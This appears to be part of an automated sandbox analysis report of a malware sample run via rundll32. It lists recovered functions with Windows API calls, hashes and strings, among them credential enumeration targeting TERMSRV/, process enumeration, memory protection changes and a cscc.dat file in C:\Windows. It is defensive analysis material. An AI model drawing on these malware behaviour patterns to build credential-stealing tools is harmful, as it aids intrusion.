                                              • Opcode Fuzzy Hash: 2458d703f53fd22195ef30dc9ee5d03c81860986c8963199d96c1f27bd2a00d6
                                              • Instruction Fuzzy Hash: E5018F30601114FBDB208FA5ED0DD9E7E7CEB89764B100052FA0EE2140D7749A45EAA0
                                              Function 04BF796E Relevance: 9.0, APIs: 6, Instructions: 36threadsynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,04BF7957,00000000,00000004,00000000), ref: 04BF7988
                                              • SetThreadToken.ADVAPI32(?,00000000,?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF799C
                                              • ResumeThread.KERNEL32(?,?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF79A9
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF79B9
                                              • GetLastError.KERNEL32(?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF79C1
                                              • CloseHandle.KERNEL32(?,?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF79CA
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Thread$CloseCreateErrorHandleLastObjectResumeSingleTokenWait
                                              • String ID:
                                              • API String ID: 1168161173-0
                                              • Opcode ID: 12a7061751cf7c99bb7f0de9601b7a868dca558c8d5edc6fc1a696ddf73c5aac
                                              • Instruction ID: 459d6dc7eba389e81b65b7817232b12fc71f9d702e24969a904a77eddf923836
                                              • Opcode Fuzzy Hash: 12a7061751cf7c99bb7f0de9601b7a868dca558c8d5edc6fc1a696ddf73c5aac
                                              • Instruction Fuzzy Hash: B6F03C7050020AFBEF009BA0DD0AF9D7B78EB04315F204291B61AE24E0DB74EA149B64
                                              Function 04BF4E60 Relevance: 7.6, APIs: 6, Instructions: 91memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04BF4E76
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4E79
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF4F2A
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4F2D
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04BF4F32
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4F35
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$Alloc
                                              • String ID:
                                              • API String ID: 3689955550-0
                                              • Opcode ID: 9dfbb638b4dd6d0695b1fae72552ecd06425cd3d63c00908ea2fc8d3bfcd017a
                                              • Instruction ID: 71e44da28ccf43907af451b991ff1d01c3ca17821e7f1c80bf545f8ec0c32192
                                              • Opcode Fuzzy Hash: 9dfbb638b4dd6d0695b1fae72552ecd06425cd3d63c00908ea2fc8d3bfcd017a
                                              • Instruction Fuzzy Hash: D9213431684244BAEB219FA4CC04FAF7FB8EF65715F008489F68D9B2D0DA75A90DC760
                                              Function 04BF50A2 Relevance: 7.6, APIs: 6, Instructions: 79memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000034,771AF380,00000000,?,?,?,04BF52FD,?,?,?,?,?,?,?,00000000), ref: 04BF50B3
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF52FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04BF50BA
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,76775200), ref: 04BF5148
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF52FD,?,?,?,?,?,?,?,00000000,00000000), ref: 04BF514F
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,76775200,?,?,?,04BF52FD,?), ref: 04BF5158
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF52FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04BF515F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$Alloc
                                              • String ID:
                                              • API String ID: 3689955550-0
                                              • Opcode ID: 746eeb07a6b00bb745ddabbaef740234bb2c30a2dcb0ea99c45faec819779bc2
                                              • Instruction ID: 96395ffb3bb3b2fcdacc12666e5011b5319298b0db4af05ed2e354dc675635a3
                                              • Opcode Fuzzy Hash: 746eeb07a6b00bb745ddabbaef740234bb2c30a2dcb0ea99c45faec819779bc2
                                              • Instruction Fuzzy Hash: 0221A172540249BAEF218FA4DC49FAA3B6CEF44315F044086FE49AB181C6B5AD19DBB0
                                              Function 04BF317C Relevance: 7.6, APIs: 6, Instructions: 57memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,04BF47E5,?,?,00000000,?,?,?,?,?,?), ref: 04BF318E
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF47E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04BF3195
                                              • rand.MSVCRT ref: 04BF31AF
                                              • rand.MSVCRT ref: 04BF31BD
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,04BF47E5,?,?,00000000,?), ref: 04BF31F4
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF47E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04BF31FB
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Processrand$AllocFree
                                              • String ID:
                                              • API String ID: 1335519115-0
                                              • Opcode ID: ecfba4219cd7e524ea020a3621180cdabbc0cbc7cdd0bb3ea5076f3c6ff06853
                                              • Instruction ID: 60e6725bb1857a52394bfc194f9d389d6c1aad0e106251c0a581507b74ab8e04
                                              • Opcode Fuzzy Hash: ecfba4219cd7e524ea020a3621180cdabbc0cbc7cdd0bb3ea5076f3c6ff06853
                                              • Instruction Fuzzy Hash: DC11A532500305BBEB019BD5CC45F9E7F69EF85750F004099FA099B180CA7AA959D770
                                              Function 04BF9972 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04BF88D3: PathFindFileNameW.SHLWAPI(04C07BC8,75A373E0,?,04BF95B2), ref: 04BF88E3
                                              • wsprintfW.USER32 ref: 04BF9AAF
                                              • wsprintfW.USER32 ref: 04BF9B0D
                                              • wsprintfW.USER32 ref: 04BF9B56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: wsprintf$FileFindNamePath
                                              • String ID: \"C:\Windows\%s\" #1
                                              • API String ID: 988121887-1875761687
                                              • Opcode ID: e47f72e9c01eb9d82f4d141538db7c470b604bd0c7c226c58faebf3031c3ac79
                                              • Instruction ID: a70ed57be5c47925fd5906acb1ccb1a055205d50e6a3289bc41eb496f3a07fdd
                                              • Opcode Fuzzy Hash: e47f72e9c01eb9d82f4d141538db7c470b604bd0c7c226c58faebf3031c3ac79
                                              • Instruction Fuzzy Hash: 3D518523E24358A5DB20DFD4EC01BEFB775FF447A0F14606AE608AB290F6B15941C799
                                              Function 04BF6F7C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04BF7170,00000000,?,04BF7AF8), ref: 04BF6F8E
                                              • GetProcAddress.KERNEL32(00000000), ref: 04BF6F95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: IsWow64Process$kernel32.dll
                                              • API String ID: 1646373207-3024904723
                                              • Opcode ID: 3fc350f417f6a4db8a4f255e2df4785725d7e04788ef3be8b82d521f37940dd3
                                              • Instruction ID: 4afbfb14a2842cfa89ef946132495dd054466cf9bc3f1198050898321ac582aa
                                              • Opcode Fuzzy Hash: 3fc350f417f6a4db8a4f255e2df4785725d7e04788ef3be8b82d521f37940dd3
                                              • Instruction Fuzzy Hash: DFD01271610209BBDB10DBD4DD0AE9DB76DDB15749F108454B50BD2080DBB9EB119F64
                                              Function 04BF4B5D Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 305memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,771AF380,76775200,00000000,?,00000000,00000000,00000000), ref: 04BF4C14
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4C1B
                                              • rand.MSVCRT ref: 04BF4CE6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcessrand
                                              • String ID: 8
                                              • API String ID: 1878709018-4194326291
                                              • Opcode ID: 09c4df24cae50829efdbfe27f07af5e946d2971b2ea2e806d669a2f49387f873
                                              • Instruction ID: 1cb499639027d7b000771b47441f396014f02e5afe7b7bafd2262ca7da225498
                                              • Opcode Fuzzy Hash: 09c4df24cae50829efdbfe27f07af5e946d2971b2ea2e806d669a2f49387f873
                                              • Instruction Fuzzy Hash: 39B12635A042569FCB168F6C88642FA7FF1EF16318F2481D9D9C9EB202D635E94EC740
                                              Function 04BF923F Relevance: 6.1, APIs: 4, Instructions: 89memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,04BF79FC,?,?,?), ref: 04BF927B
                                              • memcpy.MSVCRT ref: 04BF9294
                                              • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04BF9303
                                              • VirtualFree.KERNEL32(00000000,?,00004000), ref: 04BF9323
                                                • Part of subcall function 04BF8F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 04BF8F52
                                                • Part of subcall function 04BF8F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,03216810), ref: 04BF8FB0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Virtual$Protect$AllocFreememcpy
                                              • String ID:
                                              • API String ID: 2644210-0
                                              • Opcode ID: 7911e8e2f09c1265fc7929dd1e950474d14d9888725bb2e244ccb964edc5ad48
                                              • Instruction ID: b235477eae765d13d49ed1ccedfa816f83a294c0f10b8538dc8fc5bb15643aa4
                                              • Opcode Fuzzy Hash: 7911e8e2f09c1265fc7929dd1e950474d14d9888725bb2e244ccb964edc5ad48
                                              • Instruction Fuzzy Hash: 7821D8F1701202ABDF249FA99C44F9BB79CEB45759F0501A9BB1DE3290DA74F844C7A0
                                              Function 04BF855F Relevance: 6.1, APIs: 4, Instructions: 51processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04BF8571
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 04BF858F
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04BF85E4
                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04BF85EF
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: 6ada38f47a96646c534153690c0fac611822d1a4ba4d915ed951b661e5b79bbc
                                              • Instruction ID: d0518373d85cd01878dadf427cc795b25751884c4f0f749d7f5acba7a0924590
                                              • Opcode Fuzzy Hash: 6ada38f47a96646c534153690c0fac611822d1a4ba4d915ed951b661e5b79bbc
                                              • Instruction Fuzzy Hash: 3801B9635056146BDA3079A89C4CAAF765DD749320F1407D2EF1ED30D0E734BA884A61
                                              Function 04BF76F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 04BF770B
                                              • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 04BF77C3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Cred$EnumerateFree
                                              • String ID: TERMSRV/
                                              • API String ID: 3403564193-3001602198
                                              • Opcode ID: 2b3e1d372f89d8aa2eb83641b87dff5f837532b84418e07d2bc9b381215b3a33
                                              • Instruction ID: eaeaa0ffaad61650705e47197272af0a54cdccbb5e1a5078223f713bd3d25ac3
                                              • Opcode Fuzzy Hash: 2b3e1d372f89d8aa2eb83641b87dff5f837532b84418e07d2bc9b381215b3a33
                                              • Instruction Fuzzy Hash: F4218172A20105EFDF14DFA5CDC48AEB7BAFF44314B5584FAD20AA7210DB30A989DB50
                                              Function 04BF9332 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: gethostbynamewsprintf
                                              • String ID: %u.%u.%u.%u
                                              • API String ID: 3411498959-1542503432
                                              • Opcode ID: d9181458e9a090d8ce525a726719e03edc023a7b7a13c94e0fd72ed67d2d74d0
                                              • Instruction ID: 49fa2678dd2ba9f3df0f120c006d57537a5bbd2deef65aa6b3d2b700ca56b0c1
                                              • Opcode Fuzzy Hash: d9181458e9a090d8ce525a726719e03edc023a7b7a13c94e0fd72ed67d2d74d0
                                              • Instruction Fuzzy Hash: 66E092B12040646F87051B9ADC58C36FFECDF0965270981D6FA8ACB172C629DA20EBF4
                                              Function 04BF7E69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04BF7EA6,?), ref: 04BF7E7C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CombinePath
                                              • String ID: C:\Windows\$cscc.dat
                                              • API String ID: 3422762182-1946977352
                                              • Opcode ID: 167c288cfa122cba70ef4ef6a15df2ee6d87f90f2dbe0ca0c341c33829753d05
                                              • Instruction ID: 698626079c525ca82daad9d888a1f34d2cc7bb154db0af598f9d8ba6df3531d9
                                              • Opcode Fuzzy Hash: 167c288cfa122cba70ef4ef6a15df2ee6d87f90f2dbe0ca0c341c33829753d05
                                              • Instruction Fuzzy Hash: 83C012713C02242345111AD6AC05A56BAADDB19AA2301C172BA09D2040C995E92196E4
                                              Function 04BF641A Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,75C95350,?), ref: 04BF6439
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF6446
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF644D
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04BF6465
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ByteCharHeapMultiWide$AllocProcess
                                              • String ID:
                                              • API String ID: 1432973188-0
                                              • Opcode ID: 2aa3054e4cf007e796d36756d948a9fcfad487a93157fc01ca9ae59771cec8f0
                                              • Instruction ID: 0a78aeadb2fd4058f0fa8b75ba2cc3cfce98f2e01f125723f32870cee50b8663
                                              • Opcode Fuzzy Hash: 2aa3054e4cf007e796d36756d948a9fcfad487a93157fc01ca9ae59771cec8f0
                                              • Instruction Fuzzy Hash: 04F06DB6A04118BFAB006FA89CC4C7FBBACEB452A47100276FA15E3280D2349D1556B0
                                              Function 04BF6CED Relevance: 5.0, APIs: 4, Instructions: 31memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6CFC
                                              • HeapAlloc.KERNEL32(00000000,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6CFF
                                                • Part of subcall function 04BF6D35: EnterCriticalSection.KERNEL32(?,771AF380,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D46
                                                • Part of subcall function 04BF6D35: LeaveCriticalSection.KERNEL32(?,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D7F
                                                • Part of subcall function 04BF6D35: Sleep.KERNELBASE(00002710,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D97
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D24
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D27
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                              • String ID:
                                              • API String ID: 2739146912-0
                                              • Opcode ID: ecb59b986fe994a70505097e09c5477b99f1c62ee46a252046d05fdd320bc979
                                              • Instruction ID: 6bcd4010e19bb8df38a646a01018f67984665e7c4d865607e2aab8345fe4d3f4
                                              • Opcode Fuzzy Hash: ecb59b986fe994a70505097e09c5477b99f1c62ee46a252046d05fdd320bc979
                                              • Instruction Fuzzy Hash: A2E065722003097BEB106FE5DCC4F17BB9CFB94314F008066FA098B100CA74E8199770
                                              Function 04BF682F Relevance: 5.0, APIs: 4, Instructions: 31memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000), ref: 04BF6851
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6854
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF6860
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6863
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: e5fdc89dc49d45d167befc52a54b394d08e0e85095be741c863673244fd8a5a8
                                              • Instruction ID: 6662991924d32a31f7f1b176cd94d968e0ccf39caafb4b0926123c104f187bcb
                                              • Opcode Fuzzy Hash: e5fdc89dc49d45d167befc52a54b394d08e0e85095be741c863673244fd8a5a8
                                              • Instruction Fuzzy Hash: 46E0127270035867EA109ED6DCC4F17B79CDB94751F44407BEB08D7140C565EC058AB1

                                              Execution Graph

                                              Execution Coverage:16.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:2.4%
                                              Total number of Nodes:1066
                                              Total number of Limit Nodes:38
